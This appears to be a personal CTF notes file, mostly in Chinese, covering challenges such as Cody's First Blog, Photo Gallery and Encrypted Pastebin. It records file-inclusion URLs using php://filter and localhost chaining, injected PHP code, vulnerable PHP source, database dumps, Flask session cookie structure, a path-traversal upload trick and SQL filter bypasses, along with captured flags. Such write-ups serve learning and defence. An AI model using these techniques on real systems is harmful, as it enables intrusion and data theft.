Skip to content

Latest commit

 

History

History
executable file
·
254 lines (211 loc) · 8.78 KB

ctf_memo.org

File metadata and controls

executable file
·
254 lines (211 loc) · 8.78 KB

对新加、修改的内容格外注意,测试逻辑是否正确实现。 在出错的地方很容易再犯错。

Introduction

先获得完整的功能列表,然后像攻击者一样思考,设定一个目的,想达到什么样的效果。 设定目标优先级。

Encrypted Pastebin

^FLAG^a810c4f2706848f951204afdf6b9a46458a76cfd50b16d9d0cabca04a25c1e71$FLAG$ Traceback (most recent call last): File “./main.py”, line 69, in index post = json.loads(decryptLink(postCt).decode(‘utf8’)) File “./common.py”, line 46, in decryptLink data = b64d(data) File “./common.py”, line 11, in <lambda> b64d = lambda x: base64.decodestring(x.replace(‘~’, ‘=’).replace(‘!’, ‘/’).replace(‘-‘, ‘+’)) File “/usr/local/lib/python2.7/base64.py”, line 328, in decodestring return binascii.a2b_base64(s) Error: Incorrect padding

Traceback (most recent call last): File “./main.py”, line 69, in index post = json.loads(decryptLink(postCt).decode(‘utf8’)) File “./common.py”, line 48, in decryptLink cipher = AES.new(staticKey, AES.MODE_CBC, iv) File “/usr/local/lib/python2.7/site-packages/Crypto/Cipher/AES.py”, line 95, in new return AESCipher(key, *args, **kwargs) File “/usr/local/lib/python2.7/site-packages/Crypto/Cipher/AES.py”, line 59, in __init__ blockalgo.BlockAlgo.__init__(self, AES, key, *args, **kwargs) File “/usr/local/lib/python2.7/site-packages/Crypto/Cipher/blockalgo.py”, line 141, in __init_ self._cipher = factory.new(key, *args, **kwargs) ValueError: IV must be 16 bytes long

File Inclusion

php warning: include() failed to open stream

Photo Gallery

Database: level5 Table: photos [3 entries] ----------------------+--------+------------------------------------------------------------------+

idtitleparentfilename

----------------------+--------+------------------------------------------------------------------+

1Utterly adorable1files/adorable.jpg
2Purrfect1files/purrfect.jpg
3Invisible181e78101746ae78a93868a529b3ad715136761e29594d8f750953f0880981d9c

----------------------+--------+------------------------------------------------------------------+

Database: level5 Table: albums [1 entry] -------------+

idtitle

-------------+

1Kittens

Cody’s First Blog

心得,通过不断的试错,会不断往正确的路线靠拢,open mind。提示是很重要的, 要注意错误提示的细节,意义有很大不同。 比如这个ctf,限制服务器访问外网,限制php文件写入,并限制除了http以外的文件包含,造成看上去不能利用。 细心注意错误提示的不同,就能找到线索。

注意代码运行的环境,配置也很重要。

http://35.190.155.168:5001/ee2b7eb1b5/?page=http://www.bing.com/test <b>Notice</b>: Undefined variable: title in <b>/app/index.php</b> on line <b>30</b><br /> </h1> <br /> <b>Warning</b>: include(): php_network_getaddresses: getaddrinfo failed: Name or service not known in <b>/app/index.php</b> on line <b>21</b><br /> <br /> <b>Warning</b>: include(http://www.bing.com/test.php): failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in <b>/app/index.php</b> on line <b>21</b><br /> <br /> <b>Warning</b>: include(): Failed opening ‘http://www.bing.com/test.php’ for inclusion (include_path=’.:/usr/share/php:/usr/share/pear’) in <b>/app/index.php</b> on line <b>21</b><br />

此页面未作验证 /?page=admin.inc

包含local地址: http://35.190.155.168:5001/33ca0bc2a1/?page=http://127.0.0.1/?page=admin.inc

http://35.190.155.168:5001/33ca0bc2a1/?page=http://127.0.0.1/?page=php://filter/convert.base64-encode/resource=index 会执行首页提交注入的php代码。

没有写文件,访问外网的权限。 <?php $a = file_get_contents(“index.php”); echo $a; ?> 上面的代码,会获得提交comment页面。

<?php
	// ^FLAG^5eb6781b20f6b70f4d36556b45fe33af8b4d7281a4ab3befdc62555a79538d03$FLAG$
	mysql_connect("localhost", "root", "");
	mysql_select_db("level4");
	$page = isset($_GET['page']) ? $_GET['page'] : 'home.inc';
	if(strpos($page, ':') !== false && substr($page, 0, 5) !== "http:")
		$page = "home.inc";

	if(isset($_POST['body'])) {
		mysql_query("INSERT INTO comments (page, body, approved) VALUES ('" . mysql_real_escape_string($page) . "', '" . mysql_real_escape_string($_POST['body']) . "', 0)");
		if(strpos($_POST['body'], '<?php') !== false)
			echo '<p>^FLAG^e8dc80f7e9e5bc510d492f30d5cf58d834212d486093dd4e8598ead57c9de6c1$FLAG$</p>';
?>
	<p>Comment submitted and awaiting approval!</p>
	<a href="javascript:window.history.back()">Go back</a>
<?php
		exit();
	}

	ob_start();
	include($page . ".php");
	$body = ob_get_clean();
?>
<!doctype html>
<html>
	<head>
		<title><?php echo $title; ?> -- Cody's First Blog</title>
	</head>
	<body>
		<h1><?php echo $title; ?></h1>
		<?php echo $body; ?>
		<br>
		<br>
		<hr>
		<h3>Comments</h3>
		<!--<a href="?page=admin.auth.inc">Admin login</a>-->
		<h4>Add comment:</h4>
		<form method="POST">
			<textarea rows="4" cols="60" name="body"></textarea><br>
			<input type="submit" value="Submit">
		</form>
<?php
	$q = mysql_query("SELECT body FROM comments WHERE page='" . mysql_real_escape_string($page) . "' AND approved=1");
	while($row = mysql_fetch_assoc($q)) {
		?>
		<hr>
		<p><?php echo $row["body"]; ?></p>
		<?php
	}
?>
	</body>
</html>

<p>Welcome to my blog!  I'm excited to share my thoughts with the world.  I have many important and controversial positions, which I hope to get across here.</p>

<?php
foreach(scandir("posts", 1) as $value) {
	if($value == "." || $value == "..") continue;
	ob_start();
	include("posts/" . $value);
	$body = ob_get_clean();
	?>
	<h2><?php echo $title; ?></h2>
	<?php
	echo $body;
}
?>

<?php $title = "Home"; ?>


<h2>Pending Comments</h2>
<?php
	if(isset($_GET["approve"]))
		mysql_query("UPDATE comments SET approved=1 WHERE id=" . $_GET["approve"]);
	$q = mysql_query("SELECT id, page, body FROM comments WHERE approved=0");
	while($row = mysql_fetch_assoc($q)) {
		?>
		<hr>
		<h3>Comment on <?php echo htmlentities($row["page"]); ?></h3>
		<p><?php echo htmlentities($row["body"]); ?></p>
		<a href="?page=admin.inc&approve=<?php echo $row["id"]; ?>">Approve Comment</a>
		<?php
	}

	$title = "Admin";
?>

ticketastic

Database: level7 Table: users [7 entries] ------------------------+----------+

idusernamepassword

------------------------+----------+ Database: level7 Table: tickets [6 entries]

idbodyreplytitle

Set-Cookie: session_level7a=eyJ1c2VyIjoiYWRtaW4ifQ.XEWTDQ.7EGcPbqmlMaWqOlUVIAD4QT7JM8; HttpOnly; Path=/ Set-Cookie: session_level7a=eyJ1c2VyIjoidGVzdCJ9.XEWfwA.s8cUQJXpGfV1F01NOR7T22STv9w; HttpOnly; Path=/ .XEWP0A.nn_-oniMwm-noZ9GotoDfkwiBlE

(first admin-ss) “eyJ1c2VyIjoiYWRtaW4ifQ.XEW9vg.vpLMmHy5dpSPG-IVgoM_SqB5wHU”

(String. (base64/decode (first admin-ss))) “{"user":"admin"}��[�ྒ̘|�v�������?J�y�u” eyJ1c2VyIjoidXRlc3QifQ.XEW-Ng.JRi_2pOjIp9oFzAJMFLIeAQUbO4 flask的session第一个点前面的是payload,base64编码,如果以点开头,再用zlib解压。 中间是过期时间,最后是最重要的校验,用APP_KEY加密,根据payload和过期时间计算,进行校验。

sequence

integer-sequence-learning

Model E1337 - Rolling Code Lock

/admin /get-config

TempImage

上传修改文件路径../../test.php 修改png文件内容,php文件头不修改,包含php代码。

jiandan

http://ctf5.shiyanbar.com/web/jiandan/index.php

提交多个Id值,最后一个生效 id=unionss&id=test&id=select&submit=Login

php提交数组: id[0]=unionss&id[1]=test&id[2]=select&submit=Login (string)转换后变为’Array’

$sql=”select * from users limit “.$info[‘id’].”,0”;

test.php $id = (string)$_POST[‘id’]; if(sqliCheck($id))

function sqliCheck($str){ if(preg_match(“/\\|,|-|#|=|~|union|like|procedure/i”,$str)){ return 1; } return 0; }

只能构造–前面部分的,无法改变id的值 a:1:{s:2:”id”;s: – 0:”“;} 可以构造一个字符串,php用数组访问[‘id’]会返回第一个字符,只有一个字符,无法使用。

现在知道每次解密后的结果,知道加密数据,直接xor就可以获得中间值,不需要oracle,就是miracle啊。